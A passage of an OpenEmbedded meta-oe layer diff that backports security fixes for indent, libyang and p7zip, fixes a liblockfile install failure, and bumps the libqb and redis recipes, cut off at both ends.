++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ */ ++ { +diff --git a/regression/standard/comment-heap-overwrite.err b/regression/standard/comment-heap-overwrite.err +new file mode 100644 +index 0000000..fa571c8 +--- /dev/null ++++ b/regression/standard/comment-heap-overwrite.err +@@ -0,0 +1 @@ ++indent: input/comment-heap-overwrite.c:2044: Error:Unexpected end of file +diff --git a/src/indent.c b/src/indent.c +index 208b48a..a9f88a2 100644 +--- a/src/indent.c ++++ b/src/indent.c +@@ -228,6 +228,7 @@ static BOOLEAN search_brace( + * a `dump_line' call, thus ensuring that the brace + * will go into the right column. */ + ++ need_chars (&save_com, 2); + *save_com.end++ = EOL; + *save_com.end++ = '{'; + save_com.len += 2; +-- +2.35.5 diff --git a/meta-oe/recipes-extended/indent/indent_2.2.12.bb b/meta-oe/recipes-extended/indent/indent_2.2.12.bb index 1a7d61abc0..a846682c13 100644 --- a/meta-oe/recipes-extended/indent/indent_2.2.12.bb +++ b/meta-oe/recipes-extended/indent/indent_2.2.12.bb @@ -17,6 +17,8 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \ file://0001-Makefile.am-remove-regression-dir.patch \ file://0001-Fix-builds-with-recent-gettext.patch \ file://0001-Remove-dead-paren_level-code.patch \ + file://CVE-2023-40305_0001.patch \ + file://CVE-2023-40305_0002.patch \ " SRC_URI[md5sum] = "4764b6ac98f6654a35da117b8e5e8e14" SRC_URI[sha256sum] = "e77d68c0211515459b8812118d606812e300097cfac0b4e9fb3472664263bb8b" diff --git a/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb b/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb index d6e56ea768..edc5e00f52 100644 --- a/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb +++ b/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb @@ -11,4 +11,7 @@ SRC_URI[sha256sum] = "f4f377da17b10201a60c1108613e78ee15df6b12016b116b6de42209f4 inherit autotools pkgconfig +# upstream considers it isn't a real bug https://github.com/akheron/jansson/issues/548 +CVE_CHECK_IGNORE = "CVE-2020-36325 " + BBCLASSEXTEND = "native" diff --git a/meta-oe/recipes-extended/liblockfile/liblockfile/0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch b/meta-oe/recipes-extended/liblockfile/liblockfile/0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch new file mode 100644 index 0000000000..8ac61aa55d --- /dev/null +++ b/meta-oe/recipes-extended/liblockfile/liblockfile/0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch @@ -0,0 +1,63 @@ +From db9b4be854bb9a84319b81ce0afecd98f4f84ff7 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Mon, 27 Feb 2023 08:28:21 +0000 +Subject: [PATCH] Makefile.in: fix install failure on host without ldconfig + +fix syntax error when ldconfig is not installed on host + +when ldconfig is not installed on the build host, install will failed with +error: +ln -sf nfslock.so.0.1 /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/lib64/nfslock.so.0 +install -m 644 lockfile.h maillock.h /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/include +if test "/mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image" = ""; then ; fi +if [ "mail" != "" ]; then\ + install -g mail -m 2755 dotlockfile /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/bin;\ + else \ + install -g root -m 755 dotlockfile /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/bin; \ + fi +/bin/sh: -c: line 1: syntax error near unexpected token `;' +/bin/sh: -c: line 1: `if test "/mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image" = ""; then ; fi' + +Upstream-Status: Submitted [https://github.com/miquels/liblockfile/pull/21] + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + Makefile.in | 8 ++++++-- + 1 file changed, 6 insertions(+), 2 deletions(-) + +diff --git a/Makefile.in b/Makefile.in +index 6e53179..d003899 100644 +--- a/Makefile.in ++++ b/Makefile.in +@@ -9,6 +9,10 @@ NFSVER = 0.1 + CFLAGS = @CFLAGS@ -I. + LDFLAGS = @LDFLAGS@ + CC = @CC@ ++LDCONFIG = @LDCONFIG@ ++ifeq ($(LDCONFIG),) ++ LDCONFIG = ":" ++endif + + prefix = $(DESTDIR)@prefix@ + exec_prefix = @exec_prefix@ +@@ -58,7 +62,7 @@ install_shared: shared install_static install_common + $(libdir)/liblockfile.so.$(SOVER) + ln -s liblockfile.so.$(SOVER) $(libdir)/liblockfile.so.$(MAJOR) + ln -s liblockfile.so.$(SOVER) $(libdir)/liblockfile.so +- if test "$(DESTDIR)" = ""; then @LDCONFIG@; fi ++ if test "$(DESTDIR)" = ""; then $(LDCONFIG); fi + + install_common: + install -d -m 755 -g root -p $(includedir) +@@ -79,7 +83,7 @@ install_nfslib: nfslib + install -m 755 nfslock.so.$(NFSVER) $(nfslockdir) + ln -sf nfslock.so.$(NFSVER) $(libdir)/nfslock.so + ln -sf nfslock.so.$(NFSVER) $(libdir)/nfslock.so.0 +- if test "$(DESTDIR)" = ""; then @LDCONFIG@; fi ++ if test "$(DESTDIR)" = ""; then $(LDCONFIG); fi + + clean: + rm -f *.a *.o *.so *.so.* dotlockfile +-- +2.25.1 + diff --git a/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb b/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb index bac3a2c0bd..eefc25dc46 100644 --- a/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb +++ b/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb @@ -10,6 +10,7 @@ SRC_URI = "${DEBIAN_MIRROR}/main/libl/liblockfile/liblockfile_1.14.orig.tar.gz \ file://0001-Makefile.in-add-DESTDIR.patch \ file://0001-Makefile.in-install-nfslock-libs.patch \ file://liblockfile-fix-install-so-to-man-dir.patch \ + file://0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch \ " SRC_URI[md5sum] = "420c056ba0cc4d1477e402f70ba2f5eb" diff --git a/meta-oe/recipes-extended/libqb/libqb_2.0.6.bb b/meta-oe/recipes-extended/libqb/libqb_2.0.8.bb index ce3606d777..3db9e2e66f 100644 --- a/meta-oe/recipes-extended/libqb/libqb_2.0.6.bb +++ b/meta-oe/recipes-extended/libqb/libqb_2.0.8.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=321bf41f280cf805086dd5a720b37785" inherit autotools pkgconfig -SRCREV = "758044bed5f615c90818aa5431d00303288888e5" +SRCREV = "002171bbcf4bc4728da56c1538afd9e9d814ecaf" SRC_URI = "git://github.com/ClusterLabs/${BPN}.git;branch=main;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26916.patch b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26916.patch new file mode 100644 index 0000000000..f3af3dbffd --- /dev/null +++ b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26916.patch @@ -0,0 +1,57 @@ +From dc668d296f9f05aeab6315d44cff3208641e3096 Mon Sep 17 00:00:00 2001 +From: Michal Vasko <mvasko@cesnet.cz> +Date: Mon, 13 Feb 2023 10:23:13 +0100 +Subject: [PATCH] schema compile UPDATE do not implement 2 same modules + +CVE: CVE-2023-26916 +Upstream-Status: Backport [https://github.com/CESNET/libyang/commit/dc668d296f9f05aeab6315d44cff3208641e3096] + +Refs #1979 +--- + src/schema_compile.c | 20 +++++++------------- + 1 file changed, 7 insertions(+), 13 deletions(-) + +diff --git a/src/schema_compile.c b/src/schema_compile.c +index ed768ba0..68c0d681 100644 +--- a/src/schema_compile.c ++++ b/src/schema_compile.c +@@ -1748,7 +1748,7 @@ lys_has_compiled_import_r(struct lys_module *mod) + LY_ERR + lys_implement(struct lys_module *mod, const char **features, struct lys_glob_unres *unres) + { +- LY_ERR ret; ++ LY_ERR r; + struct lys_module *m; + + assert(!mod->implemented); +@@ -1757,21 +1757,15 @@ lys_implement(struct lys_module *mod, const char **features, struct lys_glob_unr + m = ly_ctx_get_module_implemented(mod->ctx, mod->name); + if (m) { + assert(m != mod); +- if (!strcmp(mod->name, "yang") && (strcmp(m->revision, mod->revision) > 0)) { +- /* special case for newer internal module, continue */ +- LOGVRB("Internal module \"%s@%s\" is already implemented in revision \"%s\", using it instead.", +- mod->name, mod->revision ? mod->revision : "<none>", m->revision ? m->revision : "<none>"); +- } else { +- LOGERR(mod->ctx, LY_EDENIED, "Module \"%s@%s\" is already implemented in revision \"%s\".", +- mod->name, mod->revision ? mod->revision : "<none>", m->revision ? m->revision : "<none>"); +- return LY_EDENIED; +- } ++ LOGERR(mod->ctx, LY_EDENIED, "Module \"%s@%s\" is already implemented in revision \"%s\".", ++ mod->name, mod->revision ? mod->revision : "<none>", m->revision ? m->revision : "<none>"); ++ return LY_EDENIED; + } + + /* set features */ +- ret = lys_set_features(mod->parsed, features); +- if (ret && (ret != LY_EEXIST)) { +- return ret; ++ r = lys_set_features(mod->parsed, features); ++ if (r && (r != LY_EEXIST)) { ++ return r; + } + + /* +-- +2.34.1 + diff --git a/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26917.patch b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26917.patch new file mode 100644 index 0000000000..d7ba2fb9a0 --- /dev/null +++ b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26917.patch @@ -0,0 +1,40 @@ +From cfa1a965a429e4bfc5ae1539a8e87a9cf71c3090 Mon Sep 17 00:00:00 2001 +From: Michal Vasko <mvasko@cesnet.cz> +Date: Tue, 18 Jul 2023 10:41:21 +0000 +Subject: [PATCH] parser common BUGFIX handle missing YANG strings + +Fixes #1987 + +CVE: CVE-2023-26917 + +Upstream-Status: +Backport[https://github.com/CESNET/libyang/commit/cfa1a965a429e4bfc5ae1539a8e87a9cf71c3090] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/parser_stmt.c | 10 ++++++++++ + 1 file changed, 10 insertions(+) + +diff --git a/src/parser_stmt.c b/src/parser_stmt.c +index 81ccbfca6..2ebf822ab 100644 +--- a/src/parser_stmt.c ++++ b/src/parser_stmt.c +@@ -52,6 +52,16 @@ lysp_stmt_validate_value(struct lys_parser_ctx *ctx, enum yang_arg val_type, con + uint32_t c; + size_t utf8_char_len; + ++ if (!val) { ++ if (val_type == Y_MAYBE_STR_ARG) { ++ /* fine */ ++ return LY_SUCCESS; ++ } ++ ++ LOGVAL_PARSER(ctx, LYVE_SYNTAX, "Missing an expected string."); ++ return LY_EVALID; ++ } ++ + while (*val) { + LY_CHECK_ERR_RET(ly_getutf8(&val, &c, &utf8_char_len), + LOGVAL_PARSER(ctx, LY_VCODE_INCHAR, (val)[-utf8_char_len]), LY_EVALID); +-- +2.35.5 diff --git a/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb b/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb index 2817be7c86..eb3f322519 100644 --- a/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb +++ b/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb @@ -11,6 +11,8 @@ SRCREV = "a0cc89516ab5eca84d01c85309f320a94752a64c" SRC_URI = "git://github.com/CESNET/libyang.git;branch=master;protocol=https \ file://libyang-add-stdint-h.patch \ file://run-ptest \ + file://CVE-2023-26916.patch \ + file://CVE-2023-26917.patch \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb b/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb index af0a3c2bd2..6801020ef9 100644 --- a/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb +++ b/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb @@ -17,7 +17,7 @@ REQUIRED_DISTRO_FEATURES = "pam" SRCREV = "d8eba6cb6682b59d84ca1da67a523520b879ade6" -SRC_URI = "git://github.com/Openwsman/openwsman.git;branch=master;protocol=https \ +SRC_URI = "git://github.com/Openwsman/openwsman.git;branch=main;protocol=https \ file://libssl-is-required-if-eventint-supported.patch \ file://openwsmand.service \ file://0001-lock.c-Define-PTHREAD_MUTEX_RECURSIVE_NP-if-undefine.patch \ diff --git a/meta-oe/recipes-extended/p7zip/files/CVE-2016-9296.patch b/meta-oe/recipes-extended/p7zip/files/CVE-2016-9296.patch new file mode 100644 index 0000000000..42ea716bea --- /dev/null +++ b/meta-oe/recipes-extended/p7zip/files/CVE-2016-9296.patch @@ -0,0 +1,30 @@ +From: Robert Luberda <robert@debian.org> +Date: Sat, 19 Nov 2016 08:48:08 +0100 +Subject: Fix nullptr dereference (CVE-2016-9296) + +Patch taken from https://sourceforge.net/p/p7zip/bugs/185/ + +CVE: CVE-2016-9296 + +Upstream-Status: Backport [https://snapshot.debian.org/archive/debian-debug/20180205T215659Z/pool/main/p/p7zip/p7zip_16.02%2Bdfsg-6.debian.tar.xz] + +Signed-off-by: Zahir Hussain <zahir.basha@kpit.com> +Signed-off-by: aszh07 <mail2szahir@gmail.com> +--- + CPP/7zip/Archive/7z/7zIn.cpp | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +diff --git a/CPP/7zip/Archive/7z/7zIn.cpp b/CPP/7zip/Archive/7z/7zIn.cpp +index b0c6b98..7c6dde2 100644 +--- a/CPP/7zip/Archive/7z/7zIn.cpp ++++ b/CPP/7zip/Archive/7z/7zIn.cpp +@@ -1097,7 +1097,8 @@ HRESULT CInArchive::ReadAndDecodePackedStreams( + if (CrcCalc(data, unpackSize) != folders.FolderCRCs.Vals[i]) + ThrowIncorrect(); + } +- HeadersSize += folders.PackPositions[folders.NumPackStreams]; ++ if (folders.PackPositions) ++ HeadersSize += folders.PackPositions[folders.NumPackStreams]; + return S_OK; + } + diff --git a/meta-oe/recipes-extended/p7zip/files/CVE-2018-5996.patch b/meta-oe/recipes-extended/p7zip/files/CVE-2018-5996.patch new file mode 100644 index 0000000000..6b337b8d2d --- /dev/null +++ b/meta-oe/recipes-extended/p7zip/files/CVE-2018-5996.patch @@ -0,0 +1,228 @@ +From: Robert Luberda <robert@debian.org> +Date: Sun, 28 Jan 2018 23:47:40 +0100 +Subject: CVE-2018-5996 + +Hopefully fix Memory Corruptions via RAR PPMd (CVE-2018-5996) by +applying a few changes from 7Zip 18.00-beta. + +Bug-Debian: https://bugs.debian.org/#888314 + +CVE: CVE-2018-5996 + +Upstream-Status: Backport [https://sources.debian.org/data/non-free/p/p7zip-rar/16.02-3/debian/patches/06-CVE-2018-5996.patch] + +Signed-off-by: Zahir Hussain <zahir.basha@kpit.com> +Signed-off-by: aszh07 <mail2szahir@gmail.com> +--- + CPP/7zip/Compress/Rar1Decoder.cpp | 13 +++++++++---- + CPP/7zip/Compress/Rar1Decoder.h | 1 + + CPP/7zip/Compress/Rar2Decoder.cpp | 10 +++++++++- + CPP/7zip/Compress/Rar2Decoder.h | 1 + + CPP/7zip/Compress/Rar3Decoder.cpp | 23 ++++++++++++++++++++--- + CPP/7zip/Compress/Rar3Decoder.h | 2 ++ + 6 files changed, 42 insertions(+), 8 deletions(-) + +diff --git a/CPP/7zip/Compress/Rar1Decoder.cpp b/CPP/7zip/Compress/Rar1Decoder.cpp +index 1aaedcc..68030c7 100644 +--- a/CPP/7zip/Compress/Rar1Decoder.cpp ++++ b/CPP/7zip/Compress/Rar1Decoder.cpp +@@ -29,7 +29,7 @@ public: + }; + */ + +-CDecoder::CDecoder(): m_IsSolid(false) { } ++CDecoder::CDecoder(): m_IsSolid(false), _errorMode(false) { } + + void CDecoder::InitStructures() + { +@@ -406,9 +406,14 @@ HRESULT CDecoder::CodeReal(ISequentialInStream *inStream, ISequentialOutStream * + InitData(); + if (!m_IsSolid) + { ++ _errorMode = false; + InitStructures(); + InitHuff(); + } ++ ++ if (_errorMode) ++ return S_FALSE; ++ + if (m_UnpackSize > 0) + { + GetFlagsBuf(); +@@ -477,9 +482,9 @@ STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream + const UInt64 *inSize, const UInt64 *outSize, ICompressProgressInfo *progress) + { + try { return CodeReal(inStream, outStream, inSize, outSize, progress); } +- catch(const CInBufferException &e) { return e.ErrorCode; } +- catch(const CLzOutWindowException &e) { return e.ErrorCode; } +- catch(...) { return S_FALSE; } ++ catch(const CInBufferException &e) { _errorMode = true; return e.ErrorCode; } ++ catch(const CLzOutWindowException &e) { _errorMode = true; return e.ErrorCode; } ++ catch(...) { _errorMode = true; return S_FALSE; } + } + + STDMETHODIMP CDecoder::SetDecoderProperties2(const Byte *data, UInt32 size) +diff --git a/CPP/7zip/Compress/Rar1Decoder.h b/CPP/7zip/Compress/Rar1Decoder.h +index 630f089..01b606b 100644 +--- a/CPP/7zip/Compress/Rar1Decoder.h ++++ b/CPP/7zip/Compress/Rar1Decoder.h +@@ -39,6 +39,7 @@ public: + + Int64 m_UnpackSize; + bool m_IsSolid; ++ bool _errorMode; + + UInt32 ReadBits(int numBits); + HRESULT CopyBlock(UInt32 distance, UInt32 len); +diff --git a/CPP/7zip/Compress/Rar2Decoder.cpp b/CPP/7zip/Compress/Rar2Decoder.cpp +index b3f2b4b..0580c8d 100644 +--- a/CPP/7zip/Compress/Rar2Decoder.cpp ++++ b/CPP/7zip/Compress/Rar2Decoder.cpp +@@ -80,7 +80,8 @@ static const UInt32 kHistorySize = 1 << 20; + static const UInt32 kWindowReservSize = (1 << 22) + 256; + + CDecoder::CDecoder(): +- m_IsSolid(false) ++ m_IsSolid(false), ++ m_TablesOK(false) + { + } + +@@ -100,6 +101,8 @@ UInt32 CDecoder::ReadBits(unsigned numBits) { return m_InBitStream.ReadBits(numB + + bool CDecoder::ReadTables(void) + { ++ m_TablesOK = false; ++ + Byte levelLevels[kLevelTableSize]; + Byte newLevels[kMaxTableSize]; + m_AudioMode = (ReadBits(1) == 1); +@@ -170,6 +173,8 @@ bool CDecoder::ReadTables(void) + } + + memcpy(m_LastLevels, newLevels, kMaxTableSize); ++ m_TablesOK = true; ++ + return true; + } + +@@ -344,6 +349,9 @@ HRESULT CDecoder::CodeReal(ISequentialInStream *inStream, ISequentialOutStream * + return S_FALSE; + } + ++ if (!m_TablesOK) ++ return S_FALSE; ++ + UInt64 startPos = m_OutWindowStream.GetProcessedSize(); + while (pos < unPackSize) + { +diff --git a/CPP/7zip/Compress/Rar2Decoder.h b/CPP/7zip/Compress/Rar2Decoder.h +index 3a0535c..0e9005f 100644 +--- a/CPP/7zip/Compress/Rar2Decoder.h ++++ b/CPP/7zip/Compress/Rar2Decoder.h +@@ -139,6 +139,7 @@ class CDecoder : + + UInt64 m_PackSize; + bool m_IsSolid; ++ bool m_TablesOK; + + void InitStructures(); + UInt32 ReadBits(unsigned numBits); +diff --git a/CPP/7zip/Compress/Rar3Decoder.cpp b/CPP/7zip/Compress/Rar3Decoder.cpp +index 3bf2513..6cb8a6a 100644 +--- a/CPP/7zip/Compress/Rar3Decoder.cpp ++++ b/CPP/7zip/Compress/Rar3Decoder.cpp +@@ -92,7 +92,8 @@ CDecoder::CDecoder(): + _writtenFileSize(0), + _vmData(0), + _vmCode(0), +- m_IsSolid(false) ++ m_IsSolid(false), ++ _errorMode(false) + { + Ppmd7_Construct(&_ppmd); + } +@@ -545,6 +546,9 @@ HRESULT CDecoder::ReadTables(bool &keepDecompressing) + return InitPPM(); + } + ++ TablesRead = false; ++ TablesOK = false; ++ + _lzMode = true; + PrevAlignBits = 0; + PrevAlignCount = 0; +@@ -606,6 +610,9 @@ HRESULT CDecoder::ReadTables(bool &keepDecompressing) + } + } + } ++ if (InputEofError()) ++ return S_FALSE; ++ + TablesRead = true; + + // original code has check here: +@@ -623,6 +630,9 @@ HRESULT CDecoder::ReadTables(bool &keepDecompressing) + RIF(m_LenDecoder.Build(&newLevels[kMainTableSize + kDistTableSize + kAlignTableSize])); + + memcpy(m_LastLevels, newLevels, kTablesSizesSum); ++ ++ TablesOK = true; ++ + return S_OK; + } + +@@ -824,7 +834,12 @@ HRESULT CDecoder::CodeReal(ICompressProgressInfo *progress) + PpmEscChar = 2; + PpmError = true; + InitFilters(); ++ _errorMode = false; + } ++ ++ if (_errorMode) ++ return S_FALSE; ++ + if (!m_IsSolid || !TablesRead) + { + bool keepDecompressing; +@@ -838,6 +853,8 @@ HRESULT CDecoder::CodeReal(ICompressProgressInfo *progress) + bool keepDecompressing; + if (_lzMode) + { ++ if (!TablesOK) ++ return S_FALSE; + RINOK(DecodeLZ(keepDecompressing)) + } + else +@@ -901,8 +918,8 @@ STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream + _unpackSize = outSize ? *outSize : (UInt64)(Int64)-1; + return CodeReal(progress); + } +- catch(const CInBufferException &e) { return e.ErrorCode; } +- catch(...) { return S_FALSE; } ++ catch(const CInBufferException &e) { _errorMode = true; return e.ErrorCode; } ++ catch(...) { _errorMode = true; return S_FALSE; } + // CNewException is possible here. But probably CNewException is caused + // by error in data stream. + } +diff --git a/CPP/7zip/Compress/Rar3Decoder.h b/CPP/7zip/Compress/Rar3Decoder.h +index c130cec..2f72d7d 100644 +--- a/CPP/7zip/Compress/Rar3Decoder.h ++++ b/CPP/7zip/Compress/Rar3Decoder.h +@@ -192,6 +192,7 @@ class CDecoder: + UInt32 _lastFilter; + + bool m_IsSolid; ++ bool _errorMode; + + bool _lzMode; + bool _unsupportedFilter; +@@ -200,6 +201,7 @@ class CDecoder: + UInt32 PrevAlignCount; + + bool TablesRead; ++ bool TablesOK; + + CPpmd7 _ppmd; + int PpmEscChar; diff --git a/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb b/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb index 04923116cf..e795482eb6 100644 --- a/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb +++ b/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb @@ -10,6 +10,8 @@ SRC_URI = "http://downloads.sourceforge.net/p7zip/p7zip/${PV}/p7zip_${PV}_src_al file://CVE-2017-17969.patch \ file://0001-Fix-narrowing-errors-Wc-11-narrowing.patch \ file://change_numMethods_from_bool_to_unsigned.patch \ + file://CVE-2018-5996.patch \ + file://CVE-2016-9296.patch \ " SRC_URI[md5sum] = "a0128d661cfe7cc8c121e73519c54fbf" diff --git a/meta-oe/recipes-extended/redis/redis-7/0001-src-Do-not-reset-FINAL_LIBS.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/0001-src-Do-not-reset-FINAL_LIBS.patch index e8d8b1d53f..e8d8b1d53f 100644 --- a/meta-oe/recipes-extended/redis/redis-7/0001-src-Do-not-reset-FINAL_LIBS.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/0001-src-Do-not-reset-FINAL_LIBS.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/0006-Define-correct-gregs-for-RISCV32.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/0006-Define-correct-gregs-for-RISCV32.patch index 01f8421811..385b0aeed0 100644 --- a/meta-oe/recipes-extended/redis/redis-7/0006-Define-correct-gregs-for-RISCV32.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/0006-Define-correct-gregs-for-RISCV32.patch @@ -1,4 +1,4 @@ -From f26a978c638bcbc621669dce0ab89e43af42af98 Mon Sep 17 00:00:00 2001 +From b6b2c652abfa98093401b232baca8719c50cadf4 Mon Sep 17 00:00:00 2001 From: Khem Raj <raj.khem@gmail.com> Date: Mon, 26 Oct 2020 21:32:22 -0700 Subject: [PATCH] Define correct gregs for RISCV32 @@ -6,18 +6,17 @@ Subject: [PATCH] Define correct gregs for RISCV32 Upstream-Status: Pending Signed-off-by: Khem Raj <raj.khem@gmail.com> -Updated patch for 6.2.1 -Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com> - +Updated patch for 6.2.8 +Signed-off-by: Changqing Li <changqing.li@windriver.com> --- src/debug.c | 26 ++++++++++++++++++++++++-- 1 file changed, 24 insertions(+), 2 deletions(-) diff --git a/src/debug.c b/src/debug.c -index 2da2c5d..1d778fa 100644 +index ebda858..90bc450 100644 --- a/src/debug.c +++ b/src/debug.c -@@ -1116,7 +1116,9 @@ static void *getMcontextEip(ucontext_t *uc) { +@@ -1168,7 +1168,9 @@ static void* getAndSetMcontextEip(ucontext_t *uc, void *eip) { #endif #elif defined(__linux__) /* Linux */ @@ -25,10 +24,10 @@ index 2da2c5d..1d778fa 100644 + #if defined(__riscv) && __riscv_xlen == 32 + return (void*) uc->uc_mcontext.__gregs[REG_PC]; + #elif defined(__i386__) || ((defined(__X86_64__) || defined(__x86_64__)) && defined(__ILP32__)) - return (void*) uc->uc_mcontext.gregs[14]; /* Linux 32 */ + GET_SET_RETURN(uc->uc_mcontext.gregs[14], eip); #elif defined(__X86_64__) || defined(__x86_64__) - return (void*) uc->uc_mcontext.gregs[16]; /* Linux 64 */ -@@ -1298,8 +1300,28 @@ void logRegisters(ucontext_t *uc) { + GET_SET_RETURN(uc->uc_mcontext.gregs[16], eip); +@@ -1350,8 +1352,28 @@ void logRegisters(ucontext_t *uc) { #endif /* Linux */ #elif defined(__linux__) @@ -58,3 +57,6 @@ index 2da2c5d..1d778fa 100644 serverLog(LL_WARNING, "\n" "EAX:%08lx EBX:%08lx ECX:%08lx EDX:%08lx\n" +-- +2.25.1 + diff --git a/meta-oe/recipes-extended/redis/redis-7/GNU_SOURCE.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/GNU_SOURCE-7.patch index 6e07c25c6a..6e07c25c6a 100644 --- a/meta-oe/recipes-extended/redis/redis-7/GNU_SOURCE.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/GNU_SOURCE-7.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/hiredis-use-default-CC-if-it-is-set.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/hiredis-use-default-CC-if-it-is-set.patch index 657b0923e2..657b0923e2 100644 --- a/meta-oe/recipes-extended/redis/redis-7/hiredis-use-default-CC-if-it-is-set.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/hiredis-use-default-CC-if-it-is-set.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/init-redis-server b/meta-oe/recipes-extended/redis/redis-7.0.13/init-redis-server index 6014d70c0e..6014d70c0e 100755 --- a/meta-oe/recipes-extended/redis/redis-7/init-redis-server +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/init-redis-server diff --git a/meta-oe/recipes-extended/redis/redis-7/lua-update-Makefile-to-use-environment-build-setting.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/lua-update-Makefile-to-use-environment-build-setting.patch index c6c6fde162..c6c6fde162 100644 --- a/meta-oe/recipes-extended/redis/redis-7/lua-update-Makefile-to-use-environment-build-setting.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/lua-update-Makefile-to-use-environment-build-setting.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/oe-use-libc-malloc.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/oe-use-libc-malloc.patch index bf6d0cf3c1..bf6d0cf3c1 100644 --- a/meta-oe/recipes-extended/redis/redis-7/oe-use-libc-malloc.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/oe-use-libc-malloc.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/redis.conf b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.conf index 75037d6dc8..75037d6dc8 100644 --- a/meta-oe/recipes-extended/redis/redis-7/redis.conf +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.conf diff --git a/meta-oe/recipes-extended/redis/redis-7/redis.service b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.service index 36d29852da..a52204cc70 100644 --- a/meta-oe/recipes-extended/redis/redis-7/redis.service +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.service @@ -9,6 +9,7 @@ 